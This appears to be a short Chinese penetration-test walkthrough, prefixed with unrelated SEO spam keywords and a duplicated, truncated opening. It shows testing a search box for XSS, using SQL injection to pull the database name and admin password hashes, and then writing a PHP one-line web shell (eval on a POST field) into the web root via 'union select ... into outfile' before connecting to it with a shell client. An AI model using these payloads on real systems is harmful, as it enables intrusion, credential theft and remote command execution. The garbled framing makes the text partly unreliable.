软件定制开发平台,中国十大seo,网站开发校园经历范文,中国十大网络营销平台1.xss漏洞
搜索框输入以下代码#xff0c;验证是否存在xss漏洞
scriptalert(1)/script OK了#xff0c;存在xss漏洞 2.SQL注入
经过测试#xff0c;输入框存在SQL注入漏洞 查询数据库名 查询管理员账号密码 此处密码为MD5加密#xff0c;解码内容如下 找…1.xss漏洞
搜索框输入以下代码验证是否存在xss漏洞
scriptalert(1)/script OK了存在xss漏洞 2.SQL注入
经过测试输入框存在SQL注入漏洞 查询数据库名 查询管理员账号密码 此处密码为MD5加密解码内容如下 找了半天没有找到管理员登录界面所以找到管理员账号和密码没有用虽然没有但是证明了一点那就是此处可以无限制输入命令并执行通过扫描目录发现存在phpinfo文件访问得知网站绝对路径 于是乎尝试使用sql注入的方式上传一句话木马
-1 union select 1,?php eval($_POST[cmd]);?,3 into outfile /var/www/html/www.php #
根据设定的地址访问上传的文件 写入成功蚁剑连接大脑cmd代替思考 完事
